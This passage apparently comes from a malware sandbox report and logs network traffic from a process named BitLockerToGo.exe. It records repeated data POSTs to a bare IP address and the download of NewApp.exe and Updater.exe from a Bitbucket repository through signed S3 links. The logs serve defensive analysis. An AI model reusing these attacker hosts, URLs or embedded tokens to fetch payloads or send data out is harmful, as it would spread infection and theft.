          Date: Sat, 05 Oct 2024 08:22:52 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:52 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 461
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:53 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:53 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          bitbucket.org
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          bitbucket.org
          IN A
          Response
          bitbucket.org
          IN A
          185.166.142.23
          bitbucket.org
          IN A
          185.166.142.21
          bitbucket.org
          IN A
          185.166.142.22
        • flag-ie
          GET
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/NewApp.exe
          BitLockerToGo.exe
          Remote address:
          185.166.142.23:443
          Request
          GET /hgtbvfd11/123aqd/downloads/NewApp.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: bitbucket.org
          Cache-Control: no-cache
          Response
          HTTP/1.1 302 Found
          Date: Sat, 05 Oct 2024 08:22:54 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 0
          Server: AtlassianEdge
          Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374
          Expires: Sat, 05 Oct 2024 08:22:54 GMT
          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
          X-Used-Mesh: False
          Vary: Accept-Language, Origin
          Content-Language: en
          X-View-Name: bitbucket.apps.downloads.views.download_file
          X-Dc-Location: Micros-3
          X-Served-By: db45e76b7fb5
          X-Version: 8e66bccd2be3
          X-Static-Version: 8e66bccd2be3
          X-Request-Count: 2075
          X-Render-Time: 0.4971165657043457
          X-B3-Traceid: 7d378ac2edac400bb8edaf5f749617e9
          X-B3-Spanid: aac2380f9dde3aa9
          X-Frame-Options: SAMEORIGIN
          Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
          X-Usage-Quota-Remaining: 988171.043
          X-Usage-Request-Cost: 11967.73
          X-Usage-User-Time: 0.288637
          X-Usage-System-Time: 0.070395
          X-Usage-Input-Ops: 0
          X-Usage-Output-Ops: 0
          Age: 0
          X-Cache: MISS
          X-Content-Type-Options: nosniff
          X-Xss-Protection: 1; mode=block
          Atl-Traceid: 7d378ac2edac400bb8edaf5f749617e9
          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
          Server-Timing: atl-edge;dur=581,atl-edge-internal;dur=3,atl-edge-upstream;dur=580,atl-edge-pop;desc="aws-eu-west-1"
        • flag-ie
          GET
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe
          BitLockerToGo.exe
          Remote address:
          185.166.142.23:443
          Request
          GET /hgtbvfd11/123aqd/downloads/Updater.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: bitbucket.org
          Cache-Control: no-cache
          Response
          HTTP/1.1 302 Found
          Date: Sat, 05 Oct 2024 08:23:03 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 0
          Server: AtlassianEdge
          Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          Expires: Sat, 05 Oct 2024 08:23:03 GMT
          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
          X-Used-Mesh: False
          Vary: Accept-Language, Origin
          Content-Language: en
          X-View-Name: bitbucket.apps.downloads.views.download_file
          X-Dc-Location: Micros-3
          X-Served-By: 2b8e2936830e
          X-Version: 8e66bccd2be3
          X-Static-Version: 8e66bccd2be3
          X-Request-Count: 3966
          X-Render-Time: 1.3546416759490967
          X-B3-Traceid: 1accf5bf39c544efba03694af767c8ce
          X-B3-Spanid: 48afa128dd543fd9
          X-Frame-Options: SAMEORIGIN
          Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
          X-Usage-Quota-Remaining: 950920.181
          X-Usage-Request-Cost: 39699.20
          X-Usage-User-Time: 1.087623
          X-Usage-System-Time: 0.103353
          X-Usage-Input-Ops: 0
          X-Usage-Output-Ops: 0
          Age: 0
          X-Cache: MISS
          X-Content-Type-Options: nosniff
          X-Xss-Protection: 1; mode=block
          Atl-Traceid: 1accf5bf39c544efba03694af767c8ce
          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
          Server-Timing: atl-edge;dur=1439,atl-edge-internal;dur=3,atl-edge-upstream;dur=1438,atl-edge-pop;desc="aws-eu-west-1"
        • flag-us
          DNS
          23.142.166.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          23.142.166.185.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          bbuseruploads.s3.amazonaws.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          bbuseruploads.s3.amazonaws.com
          IN A
          Response
          bbuseruploads.s3.amazonaws.com
          IN CNAME
          s3-1-w.amazonaws.com
          s3-1-w.amazonaws.com
          IN CNAME
          s3-w.us-east-1.amazonaws.com
          s3-w.us-east-1.amazonaws.com
          IN A
          3.5.16.13
          s3-w.us-east-1.amazonaws.com
          IN A
          16.182.71.105
          s3-w.us-east-1.amazonaws.com
          IN A
          54.231.228.41
          s3-w.us-east-1.amazonaws.com
          IN A
          52.216.37.97
          s3-w.us-east-1.amazonaws.com
          IN A
          16.182.38.177
          s3-w.us-east-1.amazonaws.com
          IN A
          3.5.28.154
          s3-w.us-east-1.amazonaws.com
          IN A
          54.231.197.129
          s3-w.us-east-1.amazonaws.com
          IN A
          52.216.51.145
        • flag-us
          GET
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374
          BitLockerToGo.exe
          Remote address:
          3.5.16.13:443
          Request
          GET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374 HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Cache-Control: no-cache
          Host: bbuseruploads.s3.amazonaws.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          x-amz-id-2: OX7+AQllbMDWg/qJ0m/ptfyZcYspBVfr37Xslk9HgriTFW5hRRePhgGtijICh/wKP7vIGoNTJZiiD2cGgUMWwQUOoTdtAcQY
          x-amz-request-id: X6YMGC3GW2H9JD2E
          Date: Sat, 05 Oct 2024 08:22:56 GMT
          Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
          ETag: "2eea3ddbfc81544b54a4ac5028a30805"
          x-amz-server-side-encryption: AES256
          x-amz-version-id: Fk1G95uwCTSIHuiL1YR58Oq1fwlhJgaG
          Content-Disposition: attachment; filename="NewApp.exe"
          Accept-Ranges: bytes
          Content-Type: application/x-msdownload
          Server: AmazonS3
          Content-Length: 5853680
        • flag-us
          GET
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          BitLockerToGo.exe
          Remote address:
          3.5.16.13:443
          Request
          GET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383 HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Cache-Control: no-cache
          Host: bbuseruploads.s3.amazonaws.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          x-amz-id-2: aXi/9TfXejvaRhPyLg+ydwURyr3j3B7ZhXAMGnmjrh65hbpF9LBtqUuUzJzPaskdISrFc3VBDo137njbR1YDVH0ImjmPj97V
          x-amz-request-id: YDXD9SKQJ8PBGEAE
          Date: Sat, 05 Oct 2024 08:23:04 GMT
          Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
          ETag: "925ec45b5ac88ab7af039190589204b9"
          x-amz-server-side-encryption: AES256
          x-amz-version-id: lceKswdw3_ZaYw5A4dJzcUOjLOVj1QhX
          Content-Disposition: attachment; filename="Updater.exe"
          Accept-Ranges: bytes
          Content-Type: application/x-msdownload
          Server: AmazonS3
          Content-Length: 5699232
        • flag-us
          DNS
          ocsp.r2m01.amazontrust.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          ocsp.r2m01.amazontrust.com
          IN A
          Response
          ocsp.r2m01.amazontrust.com
          IN A
          18.238.246.206
        • flag-nl
          GET
          http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D
          BitLockerToGo.exe
          Remote address:
          18.238.246.206:80
          Request
          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Microsoft-CryptoAPI/10.0
          Host: ocsp.r2m01.amazontrust.com
          Response
          HTTP/1.1 200 OK
          Content-Type: application/ocsp-response
          Content-Length: 471
          Connection: keep-alive
          Accept-Ranges: bytes
          Cache-Control: max-age=7200
          Date: Sat, 05 Oct 2024 06:24:08 GMT
          Last-Modified: Sat, 05 Oct 2024 06:24:08 GMT
          Server: ECAcc (frc/4CD7)
          X-Cache: Hit from cloudfront
          Via: 1.1 432282689bafd802e8ec9636c256a3b0.cloudfront.net (CloudFront)
          X-Amz-Cf-Pop: AMS58-P1
          X-Amz-Cf-Id: Kc_9wOZeo2P8CZ50r6-sWscjmVa5gz56yyasNlouYNFzAJ2NurVqfw==
          Age: 7127
        • flag-us
          DNS
          197.87.175.4.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          197.87.175.4.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          15.164.165.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          15.164.165.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          13.16.5.3.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          13.16.5.3.in-addr.arpa
          IN PTR
          Response
          13.16.5.3.in-addr.arpa
          IN PTR
          s3-w us-east-1 amazonawscom
        • flag-us
          DNS
          174.15.239.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          174.15.239.18.in-addr.arpa
          IN PTR
          Response
          174.15.239.18.in-addr.arpa
          IN PTR
          server-18-239-15-174ams58r cloudfrontnet
        • flag-us
          DNS
          80.41.65.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          80.41.65.18.in-addr.arpa
          IN PTR
          Response
          80.41.65.18.in-addr.arpa
          IN PTR
          server-18-65-41-80ams1r cloudfrontnet
        • flag-us
          DNS
          206.246.238.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          206.246.238.18.in-addr.arpa
          IN PTR
          Response
          206.246.238.18.in-addr.arpa
          IN PTR
          server-18-238-246-206ams58r cloudfrontnet
        • flag-us
          DNS
